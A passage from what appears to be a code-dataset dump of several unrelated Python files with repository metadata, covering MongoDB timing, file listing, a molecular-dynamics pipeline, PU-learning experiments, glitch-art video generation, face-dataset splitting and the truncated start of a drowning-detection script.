print(f"time to search mango 1000 users: , {search_1k_users}")
time.sleep(1)
print(f"time to search mango 1000 updates , {search_1k_updates}")
time.sleep(1)
print(f"user mango load , {load_1000_users}")
print(f"Status mango load , {load_1000_status}")
add="add_random_users()"
add5kusers = timer(stmt=add,globals=globals(),number=reps)
adds = "add_random_status()"
add5kstatus = timer(stmt=adds,globals=globals(),number=reps)
dels = 'delete_status_updates("status_updates.csv",status_collection)'
#deletestatus = timer(stmt=dels,globals=globals(),number=1)
print(f"time to add 5k random user mango:, {add5kusers}")
print(f'tile to add random status mango: , {add5kstatus}')
delu = 'delete_1000_users("accounts.csv", user_collection)'
deletusers = timer(stmt=delu,globals=globals(),number=reps)
print(f"time to delete status mango: , {timer(stmt=dels,globals=globals(),number=1)}")
print(f"time to delete user mango: , {deletusers}")
| smichalove/Python320_University_of_Washington | time_mongo.py | time_mongo.py | py | 13,262 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "string.ascii_lowercase",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pathlib.Path.cwd",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "pathlib.Pa... |
36365558628 | import os
import logging
"""
读取文件函数
"""
# ------------------------------
logging.basicConfig(
level=logging.DEBUG,
format="\033[37m[%(asctime)s] [%(pathname)s] (%(levelname)s-第%(lineno)d行) \n%(message)s\033[0m")
# ------------------------------
def list_files(folder, all):  # list the files inside a folder; the argument is the folder path
"""
:param folder: path of the folder to read
:param all: all==0: only .xls files; all==1: all files
:return: a list with the full paths of all matching files
"""
try:
file_list = os.walk(folder)
#print(file_list)
path_list = []
for ph in file_list:
#print(ph)
# take only the file names of the top-level directory (ph is (dirpath, dirnames, filenames))
path_list = ph[2]
break
if len(path_list) == 0:
raise Exception("Bad path or the folder is empty")
a = []
n = 0
for e in path_list:
if all == 1:
# print("reading file", '%s' % n, e)
a.append(folder + e)
if all == 0 and ".xls" in e:
# print("reading file", '%s' % n, e)
a.append(folder + e)
n = n + 1
return a
except Exception as e:
logging.info(e)
print("Path error")
return []
if __name__ == '__main__':
a = list_files('E:/HUMEI/核价/', all=1)
print(a)
| ramchan1988/HUMEI1 | os_file.py | os_file.py | py | 1,512 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.basicConfig",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line... |
46241357 | import logging
import os
import click
import pandas as pd
import tqdm
from mol_dyn.pipeline import pipeline
from mol_dyn.utils import load_smiles_csv
@click.command()
@click.option("--smiles_csv", required=True, help="Smiles csv")
@click.option("--output_folder", required=True, help="Output folder")
@click.option("--field", type=str, default="pcff", help="Force field")
@click.option("--steps", type=int, default=500000, help="Steps")
@click.option("--cores", type=int, default=8, help="Cores")
@click.option(
"--emc_template",
type=str,
default="mol_dyn/emc_template.esh",
help="Path to the emc template file in the mol_dyn folder",
)
@click.option(
"--lammps_template",
type=str,
default="mol_dyn/lammps_template.in",
help="Path to the lammps `template file in the mol_dyn folder",
)
def main(
smiles_csv: str,
output_folder: str,
field: str = "pcff",
steps: int = 500000,
cores: int = 8,
emc_template: str = "mol_dyn/emc_template.esh",
lammps_template: str = "mol_dyn/lammps_template.in",
):
logging.basicConfig(level="INFO")
smiles_data = load_smiles_csv(smiles_csv)
os.makedirs(output_folder, exist_ok=True)
status_dict = dict()
for i in tqdm.tqdm(range(len(smiles_data))):
# index corresponds to the indice of the row in the smiles csv. The scripts creates a folder for each index, making it easy to correlate the smiles to the simulation folder
index, smiles = smiles_data.iloc[i]["Indices"], smiles_data.iloc[i]["Smiles"]
folder_path = os.path.join(output_folder, str(index))
os.makedirs(folder_path, exist_ok=True)
status = pipeline(
folder_path, steps, cores, field, smiles, emc_template, lammps_template
)
if not status["gen_emc_file"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to generate emc input file."
)
elif not status["run_emc"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to run emc."
)
elif not status["gen_lammps_file"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to generate lammps input file."
)
elif not status["run_lammps"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to run lammps."
)
elif not status["gen_spectrum"]:
logging.warning(
f"Simulation for index {index} and SMILES {smiles} failed to create spectrum from simulation."
)
status_dict[index] = status
status_df = pd.DataFrame.from_dict(status_dict, orient="index")
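# note: orient="index" turns each smiles index into a row and each pipeline
# stage flag (gen_emc_file, run_emc, ...) into a boolean column, which is why
# the summary below can simply sum the gen_spectrum column.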
logging.info(
"Success: {} of total {}: {:.3f}%".format(
status_df["gen_spectrum"].sum(),
len(status_df),
status_df["gen_spectrum"].sum() / len(status_df) * 100,
)
)
status_df.to_csv(os.path.join(output_folder, "status_lammps.csv"))
if __name__ == "__main__":
main()
| rxn4chemistry/rxn-ir-to-structure | scripts/run_md_pipeline.py | run_md_pipeline.py | py | 3,122 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "logging.basicConfig",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "mol_dyn.utils.load_smiles_csv",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "tqdm.tq... |
31525145901 | # -*- coding:utf-8 -*-
import pandas as pd # for data handling
import numpy as np # for random selections, mainly
import matplotlib.pyplot as plt # for plotting
import matplotlib
from sklearn.datasets import make_blobs
from sklearn.tree import DecisionTreeClassifier
from baggingPU import BaggingClassifierPU
from sklearn.ensemble import RandomForestClassifier
matplotlib.rcParams['font.sans-serif'] = ['SimHei']  # use the SimHei font so CJK text renders
matplotlib.rcParams['axes.unicode_minus'] = False  # render minus signs correctly with this font
plt.rcParams['figure.figsize'] = 7, 7 # graph dimensions
plt.rcParams['font.size'] = 14 # graph font size
# 0. create a blobs dataset for testing the different PU-Learning approaches
X, y = make_blobs(
n_samples=6000,
centers=[[1, 5], [5, 1], [0, 0], [6, 6]]
)
y = (y > 1).astype(int)
X = pd.DataFrame(X, columns=['feature1', 'feature2'])
y = pd.Series(y)
# Check the contents of the set
print('%d data points and %d features' % X.shape)
print('%d positive out of %d total' % (sum(y), len(y)))
# 0.1 plot the original blobs data set
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c='k', marker='.', linewidths=1, s=10, alpha=0.5,
label='Negative'
)
plt.scatter(
X[y == 1].feature1, X[y == 1].feature2,
c='b', marker='o', linewidth=0, s=50, alpha=0.5,
label='Positive'
)
plt.legend()
plt.title('Figure 1 - Original sample data')
plt.show()
# 0.2 hide the label of hidden_size=2700 positive samples (relabel them as 0)
y_orig = y.copy()
hidden_size = 2700
y.loc[
np.random.choice(
y[y == 1].index,
replace=False,
size=hidden_size
)
] = 0
# Check the new contents of the set
print('%d positive out of %d total' % (sum(y), len(y)))
# plot the data set, as model can see it
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c='k', marker='.', linewidths=1, s=10, alpha=0.5,
label='Unlabeled'
)
plt.scatter(
X[y == 1].feature1, X[y == 1].feature2,
c='b', marker='o', linewidth=0, s=50, alpha=0.5,
label='Positive'
)
plt.legend()
plt.title('Figure 2 - 2700 positive samples turned into unlabeled samples')
plt.show()
# Comparison of PU-Learning approaches
# 1.1 standard classifier
# classify the blobs samples with a plain (PU-unaware) classifier
forest = RandomForestClassifier(
n_estimators=100,
n_jobs=-1
)
# X holds the blobs features (two dimensions)
# y holds the blob labels (2700 positive samples already relabeled as unlabeled)
forest.fit(X, y)
results = pd.DataFrame({
'truth': y_orig,
'label': y,
'output_std': forest.predict_proba(X)[:, 1]
}, columns=['truth', 'label', 'output_std'])
# 1.2 conclusion of the standard classifier: show all data with label==0 (i.e. unlabeled) and inspect which positives it recovers
plt.rcParams['figure.figsize'] = 9, 7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_std, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Prediction score of unlabeled samples')
plt.title('Standard Classifier')
plt.show()
# 2.1 PU Bagging
# - the bagging approach
n_estimators = 1000
estimator = DecisionTreeClassifier()
# iP: indices of the positive samples
iP = y[y > 0].index
# iU: indices of the unlabeled samples
iU = y[y <= 0].index
# per sample, count how many iterations it was out-of-bag (OOB)
num_oob = pd.DataFrame(np.zeros(shape=y.shape), index=y.index)
# per sample, accumulate the OOB scores over the iterations
sum_oob = pd.DataFrame(np.zeros(shape=y.shape), index=y.index)
for _ in range(n_estimators):
if _ % 100 == 0:
print("current iteration: %d" % _)
# bootstrap: draw unlabeled samples at a 1:1 ratio to the positive samples
# iB: indices of the bagged (drawn) unlabeled samples
iB = np.random.choice(iU, replace=True, size=len(iP))
# i_oob: indices of the out-of-bag (not drawn) unlabeled samples
i_oob = list(set(iU) - set(iB))
# combine the positive set with the bagged unlabeled set
Xb = X[y > 0].append(X.loc[iB])
yb = y[y > 0].append(y.loc[iB])
# train the classifier
estimator.fit(Xb, yb)
# update sum_oob and num_oob for the out-of-bag data of this iteration
sum_oob.loc[i_oob, 0] += estimator.predict_proba(X.loc[i_oob])[:, 1]
num_oob.loc[i_oob, 0] += 1
# take sum_oob / num_oob as the bagging approach's score for the unlabeled data
results['output_bag'] = sum_oob / num_oob
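# note: the division is element-wise, so each unlabeled point's score is its
# mean out-of-bag probability over the iterations that held it out; a point
# that was never out-of-bag (num_oob == 0) would come out as NaN, though that
# is very unlikely with 1000 iterations.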
# 2.2 conclusion - visualize the PU bagging scores for the data with label==0 (unlabeled)
# show how the unlabeled set looks after the bagging approach
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_bag, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Prediction score of unlabeled samples')
plt.title('PU Bagging')
plt.show()
# 3.1 Using `BaggingClassifierPU`
bc = BaggingClassifierPU(
DecisionTreeClassifier(),
n_estimators=1000,
max_samples=sum(y),
n_jobs=-1
)
bc.fit(X, y)
results['output_skb'] = bc.oob_decision_function_[:, 1]
# Visualize the approach's result
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_skb, linewidth=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Scores given to unlabeled points')
plt.title(r'Using ${\tt BaggingClassifierPU}$')
plt.show()
# 4. Using `Two-Step`
# 4.1 Step1 + Step2
# Step 1: identify the set of Reliable Negatives (RN)
# if an unlabeled point scores above every known positive sample's score, label it positive;
# if it scores below every known positive sample's score, label it negative
# Step 2: train a conventional binary classifier on the positive samples plus the RN set
# relabel accordingly:
# `1` means positive;
# `-1` means unlabeled;
# `0` means confirmed negative;
ys = 2 * y - 1
# score the samples with the plain random forest from above
pred = forest.predict_proba(X)[:, 1]
# derive the probability range of the positive data from the predictions
range_P = [min(pred * (ys > 0)), max(pred * (ys > 0))]
# STEP 1
# unlabeled points scoring above all known positives are labeled positive;
# those scoring below all known positives are labeled negative
# new positive samples
iP_new = ys[(ys < 0) & (pred >= range_P[1])].index
# new negative samples
iN_new = ys[(ys < 0) & (pred <= range_P[0])].index
# commit the labels of those unlabeled samples
ys.loc[iP_new] = 1
ys.loc[iN_new] = 0
# inspect the Step 1 labeling with a scatter plot
plt.rcParams['figure.figsize'] = 7, 7
cdict = {-1: 'gray', 0: 'darkred', 1: 'blue'}
plt.scatter(
X.feature1, X.feature2,
c=[cdict[k] for k in ys],
linewidths=0, s=20, alpha=0.5
)
plt.title('Sample labels after Step 1')
plt.show()
# Classifier to be used for step 2
rf2 = RandomForestClassifier(n_estimators=1000, n_jobs=-1)
# Limit to 10 iterations (this is arbitrary, but
# otherwise this approach can take a very long time)
# the 10-iteration cap is an arbitrary hyperparameter
for i in range(10):
# If step 1 didn't find new labels, we're done
if len(iP_new) + len(iN_new) == 0 and i > 0:
break
print('Step 1 labeled %d new positives and %d new negatives.' % (len(iP_new), len(iN_new)))
print('Running Step 2, iteration %d' % (i + 1), end=' ')
# STEP 2
# Retrain on new labels and get new scores
rf2.fit(X, ys)
pred = rf2.predict_proba(X)[:, -1]
# Find the range of scores given to positive data points
range_P = [min(pred * (ys > 0)), max(pred * (ys > 0))]
# Repeat step 1
iP_new = ys[(ys < 0) & (pred >= range_P[1])].index
iN_new = ys[(ys < 0) & (pred <= range_P[0])].index
ys.loc[iP_new] = 1
ys.loc[iN_new] = 0
# Lastly, get the scores assigned by this approach
results['output_stp'] = pred
plt.scatter(
X.feature1, X.feature2,
c=[cdict[k] for k in ys],
linewidths=0, s=20, alpha=0.5
)
plt.title('Sample labels after the Step 2 iterations finished')
plt.show()
# 4.2 visualize the result of the Two-Step approach
# Visualize this approach's final results
plt.rcParams['figure.figsize']=9,7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2,
c=results[y == 0].output_stp, linewidths=0, s=50, alpha=0.5, cmap='jet_r'
)
plt.colorbar(label='Scored given to unlabeled points')
plt.title('Two-Step method PU Learning')
plt.show()
# 5. comparison of the approaches
# for every data point, average the scores of the 3 approaches
results['output_all'] = results[['output_std', 'output_bag', 'output_stp']].mean(axis=1)
# 5.1 visualize the averaged result of the three approaches
plt.rcParams['figure.figsize'] = 9, 7
plt.scatter(
X[y == 0].feature1, X[y == 0].feature2, c=results[y==0].output_all, linewidths=0, s=50, alpha=0.5
)
plt.colorbar(label='Prediction score of unlabeled samples')
plt.title('Average result of the three PU-Learning approaches')
plt.show()
# 5.2 visualize how the three PU-Learning approaches perform - number of hidden positives recovered
# print the true labels of the top-10 unlabeled points ranked by the output_std score
results[results.label==0].sort_values('output_std', ascending=False).head(10).truth
# sweep the whole hidden_size range in steps of 100
ts = range(100, hidden_size, 100)
y_std, y_bag, y_skb, y_stp, y_all = [], [], [], [], []
for t in ts:
# for each PU-Learning approach, append
# the fraction of true positives among the TOP (100, 200, 300, ..., 3000) unlabeled points ranked by score
# approach 1: standard classifier
y_std.append(
results[results.label == 0].sort_values(
'output_std', ascending=False
).head(t).truth.mean()
)
# approach 2: PU bagging
y_bag.append(
results[results.label == 0].sort_values(
'output_bag', ascending=False
).head(t).truth.mean()
)
# approach 3: BaggingClassifierPU
y_skb.append(
results[results.label == 0].sort_values(
'output_skb', ascending=False
).head(t).truth.mean()
)
# approach 4: Two-Step
y_stp.append(
results[results.label == 0].sort_values(
'output_stp', ascending=False
).head(t).truth.mean()
)
# approach 5: the average of approaches 1, 2 and 4
y_all.append(
results[results.label == 0].sort_values(
'output_all', ascending=False
).head(t).truth.mean()
)
# compare PU bagging against BaggingClassifierPU
print([y_bag[i] - y_skb[i] for i in range(len(y_bag))])
# plot the performance of the different PU-Learning approaches
plt.rcParams['font.size'] = 16
plt.rcParams['figure.figsize'] = 15, 8
plt.plot(
ts, y_std,
ts, y_bag,
ts, y_stp,
ts, y_all,
lw=3
)
vals = plt.gca().get_yticks()
plt.yticks(vals, ['%.0f%%' %(v*100) for v in vals])
plt.xlabel('Number of unlabeled points selected, ranked by highest score')
plt.ylabel('Share of selected samples that are truly positive')
plt.legend([
'Standard classifier',
'PU Bagging',
'Two-Step approach',
'Average score'
])
ylim = plt.gca().get_ylim()
plt.title('Performance of the three PU-Learning approaches and their average')
plt.grid()
plt.show()
| Batman001/pu-learning-demo | PU-Learning-Test-Blob.py | PU-Learning-Test-Blob.py | py | 11,230 | python | zh | code | 2 | github-code | 1 | [
{
"api_name": "matplotlib.rcParams",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 14,
"usage_type": "attribute"
},
{
... |
26914970028 | #!/usr/bin/env python3
import os
import random
import click
import hashlib
import imageio
from .jpeg import *
import subprocess as sp
from pathlib import Path
from contextlib import suppress
from multiprocessing import cpu_count
import concurrent.futures
cache_dir = Path.home() / '.cache/glitch-art-display'
cache_dir.mkdir(exist_ok=True)
frame_timings = [5, 4, 3, 2, 2, 1, 1, 1, 1]
def is_cached(filename):
if (cache_dir / filename).is_file():
return True
return False
def find_images(directory):
valid_suffixes = ['.jpg', '.jpeg']
convert_suffixes = ['.png']
for root,dirs,files in os.walk(directory):
for file in files:
filename = Path(root) / file
# if image is a JPEG
if any([filename.suffix.lower().endswith(s) for s in valid_suffixes]):
yield filename
# if image is an unsupported image type
elif any([filename.suffix.lower().endswith(s) for s in convert_suffixes]):
# try to convert it with imagemagick
try:
new_filename = cache_dir / (filename.stem + '.jpg')
sp.run(['convert', str(filename), str(new_filename)], check=True)
yield new_filename
except (FileNotFoundError, sp.CalledProcessError) as e:
print(f'[!] Unsupported file: {filename.name}')
print(f'[!] - please install imagemagick in order to use {filename.suffix} files')
def gen_frames(image_dir, output, glitch_amount=100, fps=25, num_image_frames=25, num_transition_frames=30, shuffle=False):
frame_groups = []
frames_output = Path(output).resolve()
frames_output.parent.mkdir(parents=True, exist_ok=True)
frame_number = 0
transition_frames = int(num_transition_frames/2)
found_images = list(find_images(image_dir))
if shuffle:
random.shuffle(found_images)
with concurrent.futures.ThreadPoolExecutor(max_workers=cpu_count()) as pool:
for image in found_images:
try:
print(f'[+] Generating frames for {image.name}')
glitched_frames = []
image_bytes = bytearray(image.read_bytes())
image_hash = hashlib.md5(image_bytes).hexdigest()
png_filename = cache_dir / f'{image_hash}.png'
if not png_filename.exists():
pool.submit(sp.run, ['convert', str(image), str(png_filename)], check=True)
# generate glitch frames
glitched_futures = []
for i in range(transition_frames):
amount = int(glitch_amount * ((i+1)/transition_frames))
glitched_futures.append(pool.submit(glitch, image, amount, i))
concurrent.futures.wait(glitched_futures)
for glitched_future in glitched_futures:
glitched_frame = glitched_future.result()
if glitched_frame:
glitched_frames.append(glitched_frame)
except KeyboardInterrupt:
pool.shutdown(wait=False, cancel_futures=True)
raise
glitch_in = []
random.shuffle(frame_timings)
for i, glitched_image in enumerate(glitched_frames[::-1]):
glitch_group = []
for j in range(frame_timings[i % len(frame_timings)]):
glitch_group.append(glitched_image)
glitch_in.append(glitch_group)
normal = []
for i in range(num_image_frames):
normal.append(png_filename)
glitch_out = []
random.shuffle(frame_timings)
for i, glitched_image in enumerate(glitched_frames):
glitch_group = []
for j in range(frame_timings[i % len(frame_timings)]):
glitch_group.append(glitched_image)
glitch_out.append(glitch_group)
frame_groups.append([glitch_in, normal, glitch_out])
frames = []
interlace_frames = max(2, min(int(transition_frames/4), 1))
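# note: max(2, min(int(transition_frames/4), 1)) always evaluates to 2, since
# the inner min() caps the value at 1; the bounds look swapped, and clamping
# transition_frames/4 into [1, 2] was perhaps the intent.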
for i, [glitch_in, normal, glitch_out] in enumerate(frame_groups):
for g in glitch_in:
frames += g
frames += normal
if i == len(frame_groups)-1:
for g in glitch_out:
frames += g
else:
# truncate end of this glitch group
glitch_out, glitch_interlaced = glitch_out[:-interlace_frames], glitch_out[-interlace_frames:]
# truncate beginning of next glitch group
frame_groups[i+1][0], glitch_next_interlaced = frame_groups[i+1][0][interlace_frames:], frame_groups[i+1][0][:interlace_frames]
for g in glitch_out:
frames += g
for i in range(min(interlace_frames, len(glitch_interlaced))):
frames += glitch_next_interlaced[i]
frames += glitch_interlaced[i]
w = imageio.get_writer(str(frames_output), format='FFMPEG', mode='I', fps=fps, macro_block_size=1)
try:
prev_frame = ''
for i, frame in enumerate(frames):
print(f'\r[+] Rendering frame {i:,}/{len(frames):,} ({i/len(frames)*100:.1f}%)', end='')
frame = str(frame)
if frame != prev_frame:
try:
read_frame = imageio.imread(frame, pilmode='RGB')
except Exception as e:
print(f'[!] Error reading {frame}: {e}')
continue
try:
w.append_data(read_frame)
except ValueError:
print(f'[!] {frame}')
raise
prev_frame = str(frame)
finally:
with suppress(Exception):
w.close()
print(f'[+] Video saved to {frames_output}')
def glitch(image, amount=None, sequence=''):
print(f'[+] Glitching {image.name} by {amount}')
if amount is None:
amount = random.randint(0,99)
else:
amount = max(0, min(99, int(amount)-1))
image = Path(image)
image_bytes = bytearray(image.read_bytes())
image_hash = hashlib.md5(image_bytes).hexdigest()
try:
jpeg = Jpeg(image_bytes)
except JpegError as e:
print(f'[!] {e}')
return
jpeg_filename = cache_dir / f'{image_hash}_{amount}_{sequence}.jpg'
png_filename = cache_dir / f'{image_hash}_{amount}_{sequence}.png'
print(f'[+] Glitching {image.name} by {amount}')
# checked for cached files
if is_cached(png_filename):
print(f'[+] Found cached frame for {png_filename}')
else:
while 1:
try:
jpeg.amount = amount
jpeg.seed = random.randint(0,99)
jpeg.iterations = max(0, min(115, int(amount*1.15)))
# create a new image if not cached
jpeg.save_image(jpeg_filename)
try:
sp.run(['convert', str(jpeg_filename), str(png_filename)], check=True)
break
except Exception:
continue
except JpegError as e:
print(f'[!] {e}')
continue
return png_filename
def main():
@click.command(context_settings={'show_default': True})
@click.argument('input', required=True, type=click.Path(exists=True, file_okay=False, dir_okay=True))
@click.argument('output', required=True, type=click.Path(dir_okay=False))
@click.option('--amount', default=50, type=click.IntRange(1, 100, clamp=True), help='Glitch amount')
@click.option('--fps', default=25, type=float, help='Frames per second')
@click.option('--normal-frames', default=25*25, type=int, help='Number of normal frames')
@click.option('--transition-frames', default=30, type=int, help='Number of glitchy transition frames')
@click.option('--dont-shuffle', is_flag=True, help='Don\'t shuffle order of images')
def go(input, output, amount, fps, normal_frames, transition_frames, dont_shuffle):
gen_frames(input, output, amount, fps, normal_frames, transition_frames, not dont_shuffle)
try:
go()
except KeyboardInterrupt:
print("Interrupted")
if __name__ == '__main__':
main() | TheTechromancer/glitch-art-display | glitch_art_display/main.py | main.py | py | 8,331 | python | en | code | 12 | github-code | 1 | [
{
"api_name": "pathlib.Path.home",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.walk",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_numbe... |
70873192355 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from os import listdir,path,curdir
from os.path import isfile, join
import re
import shutil
import pandas as pd
from sklearn.model_selection import train_test_split
import csv
import random
root = "/data01/ML/dataset/FACE_CLASSIFIER"
face_image_path = "/data01/ML/dataset/FACE_CLASSIFIER/CelebA2/CelebA/Img/img_celeba/img_celeba/img_celeba"
objects_image_path = "/data01/ML/dataset/FACE_CLASSIFIER/256_ObjectCategories_modified"
face_image_path2 = "/data01/ML/dataset/FACE_CLASSIFIER/Borderline"
def get_faces(balanced, face_image_path, face_image_path2):
filenames = []
classification = []
files = [f for f in listdir(face_image_path) if
isfile(join(face_image_path, f))]
files = random.sample(files, balanced-600)
for f in files:
filenames.append(face_image_path + "/" + f)
classification.append(1)
files2 = [f for f in listdir(face_image_path2) if
isfile(join(face_image_path2, f))]
files2 = random.sample(files2, 600)
for f in files2:
filenames.append(face_image_path2 + "/" + f)
classification.append(1)
return filenames, classification
def get_balanced_data_from_classes(min,objects_main_folder):
filenames = []
classification = []
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
files = random.sample(files, min)
for f in files:
filenames.append(objects_main_folder+"/"+dir_+"/"+f)
classification.append(0)
return filenames, classification
def get_not_balanced_data_from_classes(objects_main_folder):
filenames = []
classification = []
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
for f in files:
filenames.append(objects_main_folder + "/" + dir_ + "/" + f)
classification.append(0)
return filenames, classification
def count_min_in_objects_types(objects_main_folder):
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
min_f_numbers = 1000000
max_f_numbers = 0
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder+"/"+dir_) if isfile(join(objects_main_folder+"/"+dir_, f))]
if len(files)< min_f_numbers:
min_f_numbers = len(files)
if len(files) > max_f_numbers:
max_f_numbers = len(files)
return min_f_numbers
def get_min_between_celeba_and_objects(objects_main_folder, celeba_images_folder):
dirs = [f for f in listdir(objects_main_folder) if not isfile(join(objects_main_folder, f))]
count_objects = 0
count_faces = 0
for dir_ in dirs:
files = [f for f in listdir(objects_main_folder + "/" + dir_) if
isfile(join(objects_main_folder + "/" + dir_, f))]
count_objects = count_objects + len(files)
files_Faces = [f for f in listdir(celeba_images_folder) if
isfile(join(celeba_images_folder, f))]
count_faces = count_faces + len(files_Faces)
print(count_faces, count_objects)
return count_faces if count_faces < count_objects else count_objects
def write_csv(category, non_faces, faces):
with open("./dataset/" + category+".csv" , mode='w', newline='') as file:
file = csv.writer(file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
file.writerow(['image_path', 'face'])
for el in non_faces:
file.writerow([el[0], el[1]])
for el in faces:
file.writerow([el[0], el[1]])
if __name__ == '__main__':
#min = count_min_in_objects_types(objects_image_path)
#non_faces = get_balanced_data_from_classes(min,objects_image_path)
min = get_min_between_celeba_and_objects(objects_image_path, face_image_path)
non_faces = get_not_balanced_data_from_classes(objects_image_path)
print(len(non_faces[0]))
#print(non_faces[1])
non_faces_x_train, non_faces_x_test, non_faces_y_train, non_faces_y_test = train_test_split(non_faces[0], non_faces[1], test_size = 0.15,shuffle=True)
non_faces_x_train, non_faces_x_val, non_faces_y_train, non_faces_y_val = train_test_split(non_faces_x_train, non_faces_y_train, test_size= 0.15,shuffle=True)
print(len(non_faces_x_train),len(non_faces_x_val), len(non_faces_x_test))
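# note: the two successive test_size=0.15 splits give roughly 72% train
# (0.85*0.85), 13% validation (0.85*0.15) and 15% test.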
#for el in zip(non_faces_x_train, non_faces_y_train):
# print(el)
faces = get_faces(len(non_faces[0]), face_image_path, face_image_path2)
print(len(faces[0]))
#print(faces[1])
faces_x_train, faces_x_test, faces_y_train, faces_y_test = train_test_split(faces[0],faces[1],test_size=0.15,shuffle=True)
faces_x_train, faces_x_val, faces_y_train, faces_y_val = train_test_split(faces_x_train,faces_y_train,
test_size=0.15,shuffle=True)
print(len(faces_x_train), len(faces_x_val), len(faces_x_test))
#Define true dataset
non_faces_train, faces_train = zip(non_faces_x_train,non_faces_y_train),zip(faces_x_train,faces_y_train)
non_faces_val, faces_val = zip(non_faces_x_val,non_faces_y_val),zip(faces_x_val,faces_y_val)
non_faces_test, faces_test = zip(non_faces_x_test,non_faces_y_test),zip(faces_x_test,faces_y_test)
for tuple in [("train3", non_faces_train,faces_train),("val3",non_faces_val,faces_val),("test3", non_faces_test,faces_test)]:
print("Writing:", tuple[0])
write_csv(tuple[0],tuple[1],tuple[2])
# with open('C:/Users/Lorenzo/Desktop/Università/Machine_learning_project/dataset/FACE_CLASSIFIER/dataset.csv' , mode='w', newline='') as file:
# file = csv.writer(file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# file.writerow(['image_path', 'face'])
# for el in non_faces:
# file.writerow([el[0], el[1]])
# for el in faces:
# file.writerow([el[0], el[1]])
| lorenzo-stacchio/You-Only-Crop-Faces | support_scripts/balance_dataset_face_classifier.py | balance_dataset_face_classifier.py | py | 6,301 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path.isfile",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_numb... |
12046323109 | import sklearn
import joblib
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import albumentations
from torch.utils.data import Dataset, DataLoader
from PIL import Image
import time
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
cred = credentials.Certificate("pooleye-68d49-firebase-adminsdk-zkgaj-4f20e306ba.json")
firebase_admin.initialize_app(cred)
from playsound import playsound
import warnings
warnings.filterwarnings("ignore")
lb = joblib.load('lb.pkl')
class CustomCNN(nn.Module):
def __init__(self):
super(CustomCNN, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 5)
self.conv2 = nn.Conv2d(16, 32, 5)
self.conv3 = nn.Conv2d(32, 64, 3)
self.conv4 = nn.Conv2d(64, 128, 5)
self.fc1 = nn.Linear(128, 256)
self.fc2 = nn.Linear(256, len(lb.classes_))
self.pool = nn.MaxPool2d(2, 2)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = self.pool(F.relu(self.conv3(x)))
x = self.pool(F.relu(self.conv4(x)))
bs, _, _, _ = x.shape
x = F.adaptive_avg_pool2d(x, 1).reshape(bs, -1)
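# note: adaptive_avg_pool2d(x, 1) global-average-pools each of the 128 feature
# maps down to one value, so the flattened vector has length 128 for any input
# image size, matching fc1's in_features.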
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
print('Loading model and label binarizer...')
lb = joblib.load('lb.pkl')
model = CustomCNN().cuda()
print('Model Loaded...')
model.load_state_dict(torch.load('model.pth'))
print('Loaded model state_dict...')
aug = albumentations.Compose([
albumentations.Resize(224, 224),
])
class detection:
countDrowning = 0
ThresholdForDrowning = 30  # consecutive 'drowning' frames before the alarm fires
fram = 0
def detectDrowning(self):
#input from the camera
cap = cv2.VideoCapture(0)
if (cap.isOpened() == False):
print('Error while trying to read video')
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
while(cap.isOpened()):
start_time = time.time()
ret, frame = cap.read()
if ret == True:
model.eval()
with torch.no_grad():
